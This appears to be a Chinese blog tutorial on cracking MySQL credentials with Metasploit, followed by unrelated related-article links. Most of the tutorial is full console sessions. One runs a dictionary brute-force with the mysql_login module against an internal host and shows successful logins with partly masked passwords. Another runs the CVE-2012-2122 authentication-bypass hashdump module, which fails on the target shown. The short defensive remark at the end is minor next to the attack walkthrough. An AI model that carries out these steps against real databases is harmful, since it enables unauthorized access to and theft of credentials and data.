下面这个方式是普适的,但缺点就是必须要有自己的用户名和密码字典。其原理就是用user.txt与pass.txt的两个文本去不停交叉验证。

msf auxiliary(mysql_login) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED yes How fast to bruteforce, from to
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS          yes The target address range or CIDR identifier
RPORT yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts msf auxiliary(mysql_login) > set RHOSTS 10.199.169.160
RHOSTS => 10.199.169.160
msf auxiliary(mysql_login) > set RPORT 3307
RPORT =>
msf auxiliary(mysql_login) > set USER_FILE /home/user.txt
USER_FILE => /home/user.txt
msf auxiliary(mysql_login) > set PASS_FILE /home/pass.txt
PASS_FILE => /home/pass.txt
msf auxiliary(mysql_login) >
msf auxiliary(mysql_login) > exploit [*] 10.199.169.160: MYSQL - Found remote MySQL version 5.5.
[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:root (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:vipshop (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:vipshop!@# (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:cdtms (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: root:root (Incorrect: Access denied for user 'root'@'192.168.132.113' (using password: YES))
[+] 10.199.169.160: MYSQL - Success: 'root:vi****p'
[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:root (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:vipshop (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:vipshop!@# (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[+] 10.199.169.160: MYSQL - Success: 'cdt**s:cdt**s'
[*] Scanned of hosts (% complete)
[*] Auxiliary module execution completed

另外,针对某些特定的Mysql版本,也可以采取一些特定的手段,比如Mysql的漏洞:CVE-2012-2122

假设我们得到了一个Mysql为5.1.61, 5.2.11, 5.3.5, 5.5.22的数据库(下面这个只是操作过程,数据库版本不是含漏洞版本)

msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options Module options (auxiliary/scanner/mysql/mysql_version): Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT yes The target port
THREADS yes The number of concurrent threads msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_version) > set THREADS
THREADS =>
msf auxiliary(mysql_version) > exploit [*] 10.199.128.61: is running MySQL 5.5.-log (protocol )
[*] Scanned of hosts (% complete)
[*] Auxiliary module execution completed

第一步就是获取mysql version。第二步便配置Mysql的IP和端口就可以exploit了(事实上有IP足够了,所有端口开放的服务都能扫描得到)

msf auxiliary(mysql_hashdump) > search CVE--

Matching Modules
================ Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_authbypass_hashdump -- normal MySQL Authentication Bypass Password Dump msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) >
msf auxiliary(mysql_authbypass_hashdump) > show options Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump): Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT yes The target port
THREADS yes The number of concurrent threads
USERNAME root yes The username to authenticate as msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_authbypass_hashdump) > exploit [+] 10.199.128.61: The server allows logins, proceeding with bypass test
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[*] 10.199.128.61: Authentication bypass is % complete
[-] 10.199.128.61: Unable to bypass authentication, this target may not be vulnerable
[*] Scanned of hosts (% complete)
[*] Auxiliary module execution completed

然后这样就这么简单,你会得到一个用户名和密码。

-------------------

想想看,假设你的数据库有漏洞,别人有你一个公网IP,就能获取你的数据库信息。。。所以,网上公布重大漏洞时,不要置身事外。

用Metasploit破解Mysql用户名和密码的更多相关文章

  1. 如何修改mysql用户名和密码

    如何修改mysql用户名和密码   以修改mysql的root密码为例修改的三种方法 方法1: 用SET PASSWORD命令 mysql>SET PASSWORD FOR 'root'@'lo ...

  2. 安装WAMP 及 修改MYSQL用户名 、 密码

    1,下载并安装WAMP 2,启动服务后,找到MYSQL--MYSQL console--弹出命令窗口(刚开始没有初始用户名跟密码,可直接回车执行) 3,首先输入 use mysq;l---然后修改用户 ...

  3. python 编写暴力破解mysql用户名密码

    本文摘自别人的,自己运行调试了一下#!/user/bin/env python#-*- coding:utf-8 -*- import pymysql#导入连接数据库的模块import sys cla ...

  4. MySQL用户名和密码问题

    MySQL使用脚本的方法: source d:\datafilename.sql # mysql -uroot -p Enter password: ERROR 1045 (28000): Acces ...

  5. windows下修改mysql用户名和密码

    1.关闭正在运行的MySQL. 2.打开DOS窗口,转到mysql\bin目录. 3.输入mysqld-nt --skip-grant-tables回车.如果没有出现提示信息,那就对了. 4.再开一个 ...

  6. 破解mysql数据库的密码

    发现的1小问题 语句打错以后应该退出本语句,再继续打新语句.也可以打\c,退出本语句. 如何破解数据库的密码: 1:通过任务管理器或者服务管理,关掉mysqld(服务进程) 2:通过命令行+特殊参数开 ...

  7. 修改linux的mysql用户名和密码

    MySQL数据库密码忘记之后,可以进入linux下修改原始密码,步骤为下.第一步:登陆服务器管理员权限.第二步:进入MySQL数据配置文件 [root@VM_0_8_centos ~]# vi /et ...

  8. 快速高效的破解MySQL本地和远程密码

    http://www.kankanews.com/ICkengine/archives/212.shtml 快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修 ...

  9. [Windows Server 2012] 手工破解MySQL密码

    ★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com★ 护卫神·V课堂 是护卫神旗下专业提供服务器教学视频的网站,每周更新视频.★ 本节我们将带领大家:破解MySQL ...

随机推荐

  1. git 和 github 关系?

    1.git 和 github 是什么关系? git是一种版本控制系统.跟svn.cvs是同级的概念. github是一个网站,给用户提供git服务.这样你就不用自己部署git系统,直接用注册个账号,用 ...

  2. Android studio修改Logcat颜色

    Android studio默认的Logcat配色不利于阅读,我们可以修改自定义自己的颜色配置

  3. JNI输出log信息

    1.修改Android.mk 如生成的库文件是“.so文件”,则在Android.mk中添加如下内容: LOCAL_LDLIBS:=-L$(SYSROOT)/usr/lib -llog 如生成的库文件 ...

  4. Android 利用内容提供者添加联系人的操作

    上文中<Android 获取系统的联系人>主要介绍了怎样获取系统联系人并实战了一下,本文将介绍如何添加一条联系人信息 添加联系人 1. 添加raw_contacts表,添加一条联系人的id ...

  5. Android pull解析xml文件

    本文介绍android中使用pull来解析xml文件 先自己写一个xml文件,存一些天气信息 <?xml version="1.0" encoding="UTF-8 ...

  6. symfony2 安装并创建第一个页面

    1.安装和配置 参考 http://symfony.cn/docs/book/installation.html 使用安装工具: windows系统 Open your command console ...

  7. 1、开篇:PMO定义 - PMO项目管理办公室

    PMO,Project Management Office,项目管理办公室,笔者不按照项目管理知识体系指南PMBOK(Project Management Body Of Knowledge)上的定义 ...

  8. log的简单说明

    log的简单说明 @(NS3相关)[core][log] NS3中的日志功能是非常完善与灵活,大家有需要显示一些调试或者警告信息时最好使用log,不再使用标准输入来输出中间信息. 头文件:ns3/lo ...

  9. EnumMap

    以下内容基于jdk1.7.0_79源码: 什么是EnumMap Map接口的实现,其key-value映射中的key是Enum类型: 补充说明 其原理就是一个对象数组,数组的下标索引就是根据Map中的 ...

  10. column 'id' in field list is ambiguous

    column 'id' in field list is ambiguous  这个错误,是因为你查询语句里面有id字段的时候,没有说明是哪个表的id字段,应该加上表名(或者别名)来区分.